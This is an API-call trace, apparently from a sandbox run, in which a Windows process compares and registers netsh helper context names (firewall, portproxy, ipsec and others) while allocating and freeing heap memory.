_wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0137.904] _wcsicmp (_String1="ipv6", _String2="ip") returned 118 [0137.904] GetProcessHeap () returned 0x1cff6a50000 [0137.904] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe0) returned 0x1cff6a81e20 [0137.904] GetProcessHeap () returned 0x1cff6a50000 [0137.904] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a99980) returned 1 [0137.905] RegisterContext () returned 0x0 [0137.906] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0137.906] _wcsicmp (_String1="aaaa", _String2="ipv6") returned -8 [0137.906] _wcsicmp (_String1="aaaa", _String2="ip") returned -8 [0137.906] GetProcessHeap () returned 0x1cff6a50000 [0137.906] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x150) returned 0x1cff6a77db0 [0137.906] GetProcessHeap () returned 0x1cff6a50000 [0137.906] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a81e20) returned 1 [0137.906] RegisterContext () returned 0x0 [0137.906] _wcsicmp (_String1="diagnostics", _String2="aaaa") returned 3 [0137.906] _wcsicmp (_String1="diagnostics", _String2="ip") returned -5 [0137.906] _wcsicmp (_String1="diagnostics", _String2="ipv6") returned -5 [0137.906] _wcsicmp (_String1="diagnostics", _String2="aaaa") returned 3 [0137.907] _wcsicmp (_String1="diagnostics", _String2="ip") returned -5 [0137.907] GetProcessHeap () returned 0x1cff6a50000 [0137.907] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1c0) returned 0x1cff6aa41d0 [0137.907] GetProcessHeap () returned 0x1cff6a50000 [0137.907] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a77db0) returned 1 [0137.907] RegisterContext () returned 0x0 [0137.907] _wcsicmp (_String1="advfirewall", _String2="interface") returned -8 [0137.907] _wcsicmp (_String1="advfirewall", _String2="ras") returned -17 [0137.907] _wcsicmp (_String1="advfirewall", _String2="interface") returned -8 [0137.907] GetProcessHeap () returned 0x1cff6a50000 [0137.907] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x150) returned 0x1cff6a77db0 [0137.907] GetProcessHeap () returned 0x1cff6a50000 [0137.907] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa0ad0) returned 1 [0137.907] RegisterContext () returned 0x0 [0137.907] GetProcessHeap () returned 0x1cff6a50000 [0137.907] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a99700 [0137.907] GetProcessHeap () returned 0x1cff6a50000 [0137.907] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.907] RegisterContext () returned 0x0 [0137.907] _wcsicmp (_String1="firewall", _String2="consec") returned 3 [0137.907] _wcsicmp (_String1="firewall", _String2="consec") returned 3 [0137.907] GetProcessHeap () returned 0x1cff6a50000 [0137.907] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe0) returned 0x1cff6aa0ad0 [0137.908] GetProcessHeap () returned 0x1cff6a50000 [0137.908] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a99700) returned 1 [0137.908] RegisterContext () returned 0x0 [0137.908] _wcsicmp (_String1="monitor", _String2="consec") returned 10 [0137.908] _wcsicmp (_String1="monitor", _String2="firewall") returned 7 [0137.908] _wcsicmp (_String1="monitor", _String2="consec") returned 10 [0137.908] _wcsicmp (_String1="monitor", _String2="firewall") returned 7 [0137.908] GetProcessHeap () returned 0x1cff6a50000 [0137.908] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x150) returned 0x1cff6aa43a0 [0137.908] GetProcessHeap () returned 0x1cff6a50000 [0137.908] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa0ad0) returned 1 [0137.908] RegisterContext () returned 0x0 [0137.908] _wcsicmp (_String1="mainmode", _String2="consec") returned 10 [0137.908] _wcsicmp (_String1="mainmode", _String2="firewall") returned 7 [0137.908] _wcsicmp (_String1="mainmode", _String2="monitor") returned -14 [0137.908] _wcsicmp (_String1="mainmode", _String2="consec") returned 10 [0137.908] _wcsicmp (_String1="mainmode", _String2="firewall") returned 7 [0137.908] _wcsicmp (_String1="mainmode", _String2="monitor") returned -14 [0137.908] GetProcessHeap () returned 0x1cff6a50000 [0137.908] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1c0) returned 0x1cff6aa4500 [0137.908] GetProcessHeap () returned 0x1cff6a50000 [0137.908] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa43a0) returned 1 [0137.908] RegisterContext () returned 0x0 [0137.908] _wcsicmp (_String1="dhcpclient", _String2="advfirewall") returned 3 [0137.908] _wcsicmp (_String1="dhcpclient", _String2="interface") returned -5 [0137.908] _wcsicmp (_String1="dhcpclient", _String2="ras") returned -14 [0137.908] _wcsicmp (_String1="dhcpclient", _String2="advfirewall") returned 3 [0137.909] _wcsicmp (_String1="dhcpclient", _String2="interface") returned -5 [0137.909] GetProcessHeap () returned 0x1cff6a50000 [0137.909] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1c0) returned 0x1cff6aa46d0 [0137.909] GetProcessHeap () returned 0x1cff6a50000 [0137.909] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a77db0) returned 1 [0137.909] RegisterContext () returned 0x0 [0137.909] _wcsicmp (_String1="lan", _String2="advfirewall") returned 11 [0137.909] _wcsicmp (_String1="lan", _String2="dhcpclient") returned 8 [0137.909] _wcsicmp (_String1="lan", _String2="interface") returned 3 [0137.909] _wcsicmp (_String1="lan", _String2="ras") returned -6 [0137.909] _wcsicmp (_String1="lan", _String2="advfirewall") returned 11 [0137.909] _wcsicmp (_String1="lan", _String2="dhcpclient") returned 8 [0137.909] _wcsicmp (_String1="lan", _String2="interface") returned 3 [0137.909] _wcsicmp (_String1="lan", _String2="ras") returned -6 [0137.909] GetProcessHeap () returned 0x1cff6a50000 [0137.909] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x230) returned 0x1cff6aa48a0 [0137.909] GetProcessHeap () returned 0x1cff6a50000 [0137.909] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa46d0) returned 1 [0137.913] RegisterContext () returned 0x0 [0137.913] _wcsicmp (_String1="firewall", _String2="advfirewall") returned 5 [0137.913] _wcsicmp (_String1="firewall", _String2="dhcpclient") returned 2 [0137.913] _wcsicmp (_String1="firewall", _String2="interface") returned -3 [0137.913] _wcsicmp (_String1="firewall", _String2="lan") returned -6 [0137.913] _wcsicmp (_String1="firewall", _String2="ras") returned -12 [0137.913] _wcsicmp (_String1="firewall", _String2="advfirewall") returned 5 [0137.913] _wcsicmp (_String1="firewall", _String2="dhcpclient") returned 2 [0137.913] _wcsicmp (_String1="firewall", _String2="interface") returned -3 [0137.913] GetProcessHeap () returned 0x1cff6a50000 [0137.913] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x2a0) returned 0x1cff6aa4ae0 [0137.913] GetProcessHeap () returned 0x1cff6a50000 [0137.913] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa48a0) returned 1 [0137.913] RegisterContext () returned 0x0 [0137.913] _wcsicmp (_String1="bridge", _String2="advfirewall") returned 1 [0137.913] _wcsicmp (_String1="bridge", _String2="dhcpclient") returned -2 [0137.913] _wcsicmp (_String1="bridge", _String2="firewall") returned -4 [0137.913] _wcsicmp (_String1="bridge", _String2="interface") returned -7 [0137.913] _wcsicmp (_String1="bridge", _String2="lan") returned -10 [0137.913] _wcsicmp (_String1="bridge", _String2="ras") returned -16 [0137.913] _wcsicmp (_String1="bridge", _String2="advfirewall") returned 1 [0137.913] _wcsicmp (_String1="bridge", _String2="dhcpclient") returned -2 [0137.913] GetProcessHeap () returned 0x1cff6a50000 [0137.913] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x310) returned 0x1cff6aa46d0 [0137.914] GetProcessHeap () returned 0x1cff6a50000 [0137.914] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa4ae0) returned 1 [0137.914] RegisterContext () returned 0x0 [0137.914] _wcsicmp (_String1="netio", _String2="advfirewall") returned 13 [0137.914] _wcsicmp (_String1="netio", _String2="bridge") returned 12 [0137.914] _wcsicmp (_String1="netio", _String2="dhcpclient") returned 10 [0137.914] _wcsicmp (_String1="netio", _String2="firewall") returned 8 [0137.914] _wcsicmp (_String1="netio", _String2="interface") returned 5 [0137.914] _wcsicmp (_String1="netio", _String2="lan") returned 2 [0137.914] _wcsicmp (_String1="netio", _String2="ras") returned -4 [0137.914] _wcsicmp (_String1="netio", _String2="advfirewall") returned 13 [0137.914] _wcsicmp (_String1="netio", _String2="bridge") returned 12 [0137.914] _wcsicmp (_String1="netio", _String2="dhcpclient") returned 10 [0137.914] _wcsicmp (_String1="netio", _String2="firewall") returned 8 [0137.914] _wcsicmp (_String1="netio", _String2="interface") returned 5 [0137.914] _wcsicmp (_String1="netio", _String2="lan") returned 2 [0137.914] _wcsicmp (_String1="netio", _String2="ras") returned -4 [0137.914] GetProcessHeap () returned 0x1cff6a50000 [0137.914] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x380) returned 0x1cff6aa49f0 [0137.914] GetProcessHeap () returned 0x1cff6a50000 [0137.914] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa46d0) returned 1 [0137.914] RegisterContext () returned 0x0 [0137.914] _wcsicmp (_String1="dnsclient", _String2="advfirewall") returned 3 [0137.914] _wcsicmp (_String1="dnsclient", _String2="bridge") returned 2 [0137.914] _wcsicmp (_String1="dnsclient", _String2="dhcpclient") returned 6 [0137.915] _wcsicmp (_String1="dnsclient", _String2="firewall") returned -2 [0137.915] _wcsicmp (_String1="dnsclient", _String2="interface") returned -5 [0137.915] _wcsicmp (_String1="dnsclient", _String2="lan") returned -8 [0137.915] _wcsicmp (_String1="dnsclient", _String2="netio") returned -10 [0137.915] _wcsicmp (_String1="dnsclient", _String2="ras") returned -14 [0137.915] _wcsicmp (_String1="dnsclient", _String2="advfirewall") returned 3 [0137.915] _wcsicmp (_String1="dnsclient", _String2="bridge") returned 2 [0137.915] _wcsicmp (_String1="dnsclient", _String2="dhcpclient") returned 6 [0137.915] _wcsicmp (_String1="dnsclient", _String2="firewall") returned -2 [0137.915] GetProcessHeap () returned 0x1cff6a50000 [0137.915] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x3f0) returned 0x1cff6aac220 [0137.915] GetProcessHeap () returned 0x1cff6a50000 [0137.915] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa49f0) returned 1 [0137.915] RegisterContext () returned 0x0 [0137.915] _wcsicmp (_String1="namespace", _String2="advfirewall") returned 13 [0137.915] _wcsicmp (_String1="namespace", _String2="bridge") returned 12 [0137.915] _wcsicmp (_String1="namespace", _String2="dhcpclient") returned 10 [0137.915] _wcsicmp (_String1="namespace", _String2="dnsclient") returned 10 [0137.915] _wcsicmp (_String1="namespace", _String2="firewall") returned 8 [0137.915] _wcsicmp (_String1="namespace", _String2="interface") returned 5 [0137.915] _wcsicmp (_String1="namespace", _String2="lan") returned 2 [0137.915] _wcsicmp (_String1="namespace", _String2="netio") returned -4 [0137.915] _wcsicmp (_String1="namespace", _String2="ras") returned -4 [0137.915] _wcsicmp (_String1="namespace", _String2="advfirewall") returned 13 [0137.915] _wcsicmp (_String1="namespace", _String2="bridge") returned 12 [0137.915] _wcsicmp (_String1="namespace", _String2="dhcpclient") returned 10 [0137.915] _wcsicmp (_String1="namespace", _String2="dnsclient") returned 10 [0137.915] _wcsicmp (_String1="namespace", _String2="firewall") returned 8 [0137.915] _wcsicmp (_String1="namespace", _String2="interface") returned 5 [0137.915] _wcsicmp (_String1="namespace", _String2="lan") returned 2 [0137.915] _wcsicmp (_String1="namespace", _String2="netio") returned -4 [0137.915] GetProcessHeap () returned 0x1cff6a50000 [0137.916] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x460) returned 0x1cff6aa46d0 [0137.916] GetProcessHeap () returned 0x1cff6a50000 [0137.916] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac220) returned 1 [0137.916] RegisterContext () returned 0x0 [0137.916] GetProcessHeap () returned 0x1cff6a50000 [0137.916] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a99880 [0137.916] GetProcessHeap () returned 0x1cff6a50000 [0137.916] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.916] RegisterContext () returned 0x0 [0137.916] _wcsicmp (_String1="ipv6", _String2="ipv4") returned 2 [0137.916] _wcsicmp (_String1="ipv6", _String2="ipv4") returned 2 [0137.916] GetProcessHeap () returned 0x1cff6a50000 [0137.916] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe0) returned 0x1cff6aa0ad0 [0137.916] GetProcessHeap () returned 0x1cff6a50000 [0137.916] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a99880) returned 1 [0137.917] RegisterContext () returned 0x0 [0137.917] _wcsicmp (_String1="6to4", _String2="ipv4") returned -51 [0137.918] _wcsicmp (_String1="6to4", _String2="ipv6") returned -51 [0137.918] _wcsicmp (_String1="6to4", _String2="ipv4") returned -51 [0137.918] GetProcessHeap () returned 0x1cff6a50000 [0137.918] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x150) returned 0x1cff6aa43a0 [0137.918] GetProcessHeap () returned 0x1cff6a50000 [0137.918] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa0ad0) returned 1 [0137.919] RegisterContext () returned 0x0 [0137.919] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0137.919] _wcsicmp (_String1="isatap", _String2="ipv4") returned 3 [0137.919] _wcsicmp (_String1="isatap", _String2="ipv6") returned 3 [0137.919] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0137.919] _wcsicmp (_String1="isatap", _String2="ipv4") returned 3 [0137.919] _wcsicmp (_String1="isatap", _String2="ipv6") returned 3 [0137.919] GetProcessHeap () returned 0x1cff6a50000 [0137.919] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x1c0) returned 0x1cff6aa4b40 [0137.919] GetProcessHeap () returned 0x1cff6a50000 [0137.919] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa43a0) returned 1 [0137.919] RegisterContext () returned 0x0 [0137.919] _wcsicmp (_String1="teredo", _String2="6to4") returned 62 [0137.919] _wcsicmp (_String1="teredo", _String2="ipv4") returned 11 [0137.919] _wcsicmp (_String1="teredo", _String2="ipv6") returned 11 [0137.919] _wcsicmp (_String1="teredo", _String2="isatap") returned 11 [0137.919] _wcsicmp (_String1="teredo", _String2="6to4") returned 62 [0137.919] _wcsicmp (_String1="teredo", _String2="ipv4") returned 11 [0137.919] _wcsicmp (_String1="teredo", _String2="ipv6") returned 11 [0137.919] _wcsicmp (_String1="teredo", _String2="isatap") returned 11 [0137.920] GetProcessHeap () returned 0x1cff6a50000 [0137.920] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x230) returned 0x1cff6aa4d10 [0137.920] GetProcessHeap () returned 0x1cff6a50000 [0137.920] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa4b40) returned 1 [0137.920] RegisterContext () returned 0x0 [0137.920] _wcsicmp (_String1="portproxy", _String2="6to4") returned 58 [0137.920] _wcsicmp (_String1="portproxy", _String2="ipv4") returned 7 [0137.920] _wcsicmp (_String1="portproxy", _String2="ipv6") returned 7 [0137.920] _wcsicmp (_String1="portproxy", _String2="isatap") returned 7 [0137.920] _wcsicmp (_String1="portproxy", _String2="teredo") returned -4 [0137.920] _wcsicmp (_String1="portproxy", _String2="6to4") returned 58 [0137.920] _wcsicmp (_String1="portproxy", _String2="ipv4") returned 7 [0137.920] _wcsicmp (_String1="portproxy", _String2="ipv6") returned 7 [0137.920] _wcsicmp (_String1="portproxy", _String2="isatap") returned 7 [0137.920] _wcsicmp (_String1="portproxy", _String2="teredo") returned -4 [0137.920] GetProcessHeap () returned 0x1cff6a50000 [0137.920] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x2a0) returned 0x1cff6aac220 [0137.920] GetProcessHeap () returned 0x1cff6a50000 [0137.920] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa4d10) returned 1 [0137.921] RegisterContext () returned 0x0 [0137.921] GetProcessHeap () returned 0x1cff6a50000 [0137.921] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a99c80 [0137.921] GetProcessHeap () returned 0x1cff6a50000 [0137.921] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.921] RegisterContext () returned 0x0 [0137.921] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0137.921] _wcsicmp (_String1="isatap", _String2="6to4") returned 51 [0137.921] GetProcessHeap () returned 0x1cff6a50000 [0137.921] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe0) returned 0x1cff6aa0ad0 [0137.921] GetProcessHeap () returned 0x1cff6a50000 [0137.921] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a99c80) returned 1 [0137.921] RegisterContext () returned 0x0 [0137.921] _wcsicmp (_String1="portproxy", _String2="6to4") returned 58 [0137.921] _wcsicmp (_String1="portproxy", _String2="ipv4") returned 7 [0137.921] _wcsicmp (_String1="portproxy", _String2="ipv6") returned 7 [0137.921] _wcsicmp (_String1="portproxy", _String2="isatap") returned 7 [0137.921] _wcsicmp (_String1="portproxy", _String2="portproxy") returned 0 [0137.921] RegisterContext () returned 0x0 [0137.921] _wcsicmp (_String1="httpstunnel", _String2="6to4") returned 50 [0137.921] _wcsicmp (_String1="httpstunnel", _String2="ipv4") returned -1 [0137.921] _wcsicmp (_String1="httpstunnel", _String2="ipv6") returned -1 [0137.921] _wcsicmp (_String1="httpstunnel", _String2="isatap") returned -1 [0137.921] _wcsicmp (_String1="httpstunnel", _String2="portproxy") returned -8 [0137.921] _wcsicmp (_String1="httpstunnel", _String2="teredo") returned -12 [0137.921] _wcsicmp (_String1="httpstunnel", _String2="6to4") returned 50 [0137.921] _wcsicmp (_String1="httpstunnel", _String2="ipv4") returned -1 [0137.921] GetProcessHeap () returned 0x1cff6a50000 [0137.921] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x310) returned 0x1cff6aa4b40 [0137.922] GetProcessHeap () returned 0x1cff6a50000 [0137.922] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac220) returned 1 [0137.922] RegisterContext () returned 0x0 [0137.922] _wcsicmp (_String1="tcp", _String2="6to4") returned 62 [0137.922] _wcsicmp (_String1="tcp", _String2="httpstunnel") returned 12 [0137.922] _wcsicmp (_String1="tcp", _String2="ipv4") returned 11 [0137.922] _wcsicmp (_String1="tcp", _String2="ipv6") returned 11 [0137.922] _wcsicmp (_String1="tcp", _String2="isatap") returned 11 [0137.922] _wcsicmp (_String1="tcp", _String2="portproxy") returned 4 [0137.922] _wcsicmp (_String1="tcp", _String2="teredo") returned -2 [0137.922] _wcsicmp (_String1="tcp", _String2="6to4") returned 62 [0137.922] _wcsicmp (_String1="tcp", _String2="httpstunnel") returned 12 [0137.922] _wcsicmp (_String1="tcp", _String2="ipv4") returned 11 [0137.922] _wcsicmp (_String1="tcp", _String2="ipv6") returned 11 [0137.922] _wcsicmp (_String1="tcp", _String2="isatap") returned 11 [0137.922] _wcsicmp (_String1="tcp", _String2="portproxy") returned 4 [0137.922] _wcsicmp (_String1="tcp", _String2="teredo") returned -2 [0137.922] GetProcessHeap () returned 0x1cff6a50000 [0137.922] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x380) returned 0x1cff6aac220 [0137.922] GetProcessHeap () returned 0x1cff6a50000 [0137.922] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa4b40) returned 1 [0137.922] RegisterContext () returned 0x0 [0137.925] _wcsicmp (_String1="trace", _String2="advfirewall") returned 19 [0137.925] _wcsicmp (_String1="trace", _String2="bridge") returned 18 [0137.925] _wcsicmp (_String1="trace", _String2="dhcpclient") returned 16 [0137.925] _wcsicmp (_String1="trace", _String2="dnsclient") returned 16 [0137.925] _wcsicmp (_String1="trace", _String2="firewall") returned 14 [0137.925] _wcsicmp (_String1="trace", _String2="interface") returned 11 [0137.925] _wcsicmp (_String1="trace", _String2="lan") returned 8 [0137.925] _wcsicmp (_String1="trace", _String2="namespace") returned 6 [0137.925] _wcsicmp (_String1="trace", _String2="netio") returned 6 [0137.925] _wcsicmp (_String1="trace", _String2="ras") returned 2 [0137.925] _wcsicmp (_String1="trace", _String2="advfirewall") returned 19 [0137.925] _wcsicmp (_String1="trace", _String2="bridge") returned 18 [0137.925] _wcsicmp (_String1="trace", _String2="dhcpclient") returned 16 [0137.925] _wcsicmp (_String1="trace", _String2="dnsclient") returned 16 [0137.925] _wcsicmp (_String1="trace", _String2="firewall") returned 14 [0137.925] _wcsicmp (_String1="trace", _String2="interface") returned 11 [0137.925] _wcsicmp (_String1="trace", _String2="lan") returned 8 [0137.925] _wcsicmp (_String1="trace", _String2="namespace") returned 6 [0137.925] _wcsicmp (_String1="trace", _String2="netio") returned 6 [0137.925] _wcsicmp (_String1="trace", _String2="ras") returned 2 [0137.925] GetProcessHeap () returned 0x1cff6a50000 [0137.926] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x4d0) returned 0x1cff6aa4b40 [0137.926] GetProcessHeap () returned 0x1cff6a50000 [0137.926] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa46d0) returned 1 [0137.928] RegisterContext () returned 0x0 [0137.928] _wcsicmp (_String1="http", _String2="advfirewall") returned 7 [0137.928] _wcsicmp (_String1="http", _String2="bridge") returned 6 [0137.928] _wcsicmp (_String1="http", _String2="dhcpclient") returned 4 [0137.928] _wcsicmp (_String1="http", _String2="dnsclient") returned 4 [0137.928] _wcsicmp (_String1="http", _String2="firewall") returned 2 [0137.928] _wcsicmp (_String1="http", _String2="interface") returned -1 [0137.928] _wcsicmp (_String1="http", _String2="lan") returned -4 [0137.928] _wcsicmp (_String1="http", _String2="namespace") returned -6 [0137.928] _wcsicmp (_String1="http", _String2="netio") returned -6 [0137.928] _wcsicmp (_String1="http", _String2="ras") returned -10 [0137.928] _wcsicmp (_String1="http", _String2="trace") returned -12 [0137.928] _wcsicmp (_String1="http", _String2="advfirewall") returned 7 [0137.928] _wcsicmp (_String1="http", _String2="bridge") returned 6 [0137.928] _wcsicmp (_String1="http", _String2="dhcpclient") returned 4 [0137.928] _wcsicmp (_String1="http", _String2="dnsclient") returned 4 [0137.928] _wcsicmp (_String1="http", _String2="firewall") returned 2 [0137.929] _wcsicmp (_String1="http", _String2="interface") returned -1 [0137.929] GetProcessHeap () returned 0x1cff6a50000 [0137.929] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x540) returned 0x1cff6aac5b0 [0137.929] GetProcessHeap () returned 0x1cff6a50000 [0137.929] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa4b40) returned 1 [0137.929] RegisterContext () returned 0x0 [0137.929] _wcsicmp (_String1="ipsec", _String2="advfirewall") returned 8 [0137.929] _wcsicmp (_String1="ipsec", _String2="bridge") returned 7 [0137.929] _wcsicmp (_String1="ipsec", _String2="dhcpclient") returned 5 [0137.929] _wcsicmp (_String1="ipsec", _String2="dnsclient") returned 5 [0137.929] _wcsicmp (_String1="ipsec", _String2="firewall") returned 3 [0137.929] _wcsicmp (_String1="ipsec", _String2="http") returned 1 [0137.929] _wcsicmp (_String1="ipsec", _String2="interface") returned 2 [0137.929] _wcsicmp (_String1="ipsec", _String2="lan") returned -3 [0137.929] _wcsicmp (_String1="ipsec", _String2="namespace") returned -5 [0137.929] _wcsicmp (_String1="ipsec", _String2="netio") returned -5 [0137.929] _wcsicmp (_String1="ipsec", _String2="ras") returned -9 [0137.929] _wcsicmp (_String1="ipsec", _String2="trace") returned -11 [0137.929] _wcsicmp (_String1="ipsec", _String2="advfirewall") returned 8 [0137.929] _wcsicmp (_String1="ipsec", _String2="bridge") returned 7 [0137.930] _wcsicmp (_String1="ipsec", _String2="dhcpclient") returned 5 [0137.930] _wcsicmp (_String1="ipsec", _String2="dnsclient") returned 5 [0137.930] _wcsicmp (_String1="ipsec", _String2="firewall") returned 3 [0137.930] _wcsicmp (_String1="ipsec", _String2="http") returned 1 [0137.930] _wcsicmp (_String1="ipsec", _String2="interface") returned 2 [0137.930] _wcsicmp (_String1="ipsec", _String2="lan") returned -3 [0137.930] GetProcessHeap () returned 0x1cff6a50000 [0137.930] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x5b0) returned 0x1cff6aa46d0 [0137.930] GetProcessHeap () returned 0x1cff6a50000 [0137.930] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aac5b0) returned 1 [0137.930] RegisterContext () returned 0x0 [0137.930] GetProcessHeap () returned 0x1cff6a50000 [0137.930] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x70) returned 0x1cff6a9a200 [0137.930] GetProcessHeap () returned 0x1cff6a50000 [0137.930] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x0) returned 1 [0137.930] RegisterContext () returned 0x0 [0137.930] _wcsicmp (_String1="dynamic", _String2="static") returned -15 [0137.930] _wcsicmp (_String1="dynamic", _String2="static") returned -15 [0137.930] GetProcessHeap () returned 0x1cff6a50000 [0137.930] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0xe0) returned 0x1cff6a81e20 [0137.930] GetProcessHeap () returned 0x1cff6a50000 [0137.930] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6a9a200) returned 1 [0137.930] RegisterContext () returned 0x0 [0137.930] _wcsicmp (_String1="static", _String2="dynamic") returned 15 [0137.930] _wcsicmp (_String1="static", _String2="static") returned 0 [0137.930] RegisterContext () returned 0x0 [0137.930] _wcsicmp (_String1="dynamic", _String2="dynamic") returned 0 [0137.931] RegisterContext () returned 0x0 [0137.932] _wcsicmp (_String1="wfp", _String2="advfirewall") returned 22 [0137.932] _wcsicmp (_String1="wfp", _String2="bridge") returned 21 [0137.932] _wcsicmp (_String1="wfp", _String2="dhcpclient") returned 19 [0137.932] _wcsicmp (_String1="wfp", _String2="dnsclient") returned 19 [0137.932] _wcsicmp (_String1="wfp", _String2="firewall") returned 17 [0137.932] _wcsicmp (_String1="wfp", _String2="http") returned 15 [0137.932] _wcsicmp (_String1="wfp", _String2="interface") returned 14 [0137.932] _wcsicmp (_String1="wfp", _String2="ipsec") returned 14 [0137.932] _wcsicmp (_String1="wfp", _String2="lan") returned 11 [0137.932] _wcsicmp (_String1="wfp", _String2="namespace") returned 9 [0137.932] _wcsicmp (_String1="wfp", _String2="netio") returned 9 [0137.932] _wcsicmp (_String1="wfp", _String2="ras") returned 5 [0137.932] _wcsicmp (_String1="wfp", _String2="trace") returned 3 [0137.932] _wcsicmp (_String1="wfp", _String2="advfirewall") returned 22 [0137.932] _wcsicmp (_String1="wfp", _String2="bridge") returned 21 [0137.932] _wcsicmp (_String1="wfp", _String2="dhcpclient") returned 19 [0137.932] _wcsicmp (_String1="wfp", _String2="dnsclient") returned 19 [0137.932] _wcsicmp (_String1="wfp", _String2="firewall") returned 17 [0137.932] _wcsicmp (_String1="wfp", _String2="http") returned 15 [0137.932] _wcsicmp (_String1="wfp", _String2="interface") returned 14 [0137.932] _wcsicmp (_String1="wfp", _String2="ipsec") returned 14 [0137.932] _wcsicmp (_String1="wfp", _String2="lan") returned 11 [0137.932] _wcsicmp (_String1="wfp", _String2="namespace") returned 9 [0137.932] _wcsicmp (_String1="wfp", _String2="netio") returned 9 [0137.932] _wcsicmp (_String1="wfp", _String2="ras") returned 5 [0137.932] _wcsicmp (_String1="wfp", _String2="trace") returned 3 [0137.932] GetProcessHeap () returned 0x1cff6a50000 [0137.932] RtlAllocateHeap (HeapHandle=0x1cff6a50000, Flags=0x0, Size=0x620) returned 0x1cff6aac5b0 [0137.932] GetProcessHeap () returned 0x1cff6a50000 [0137.932] RtlFreeHeap (HeapHandle=0x1cff6a50000, Flags=0x0, BaseAddress=0x1cff6aa46d0) returned 1 [0137.935] 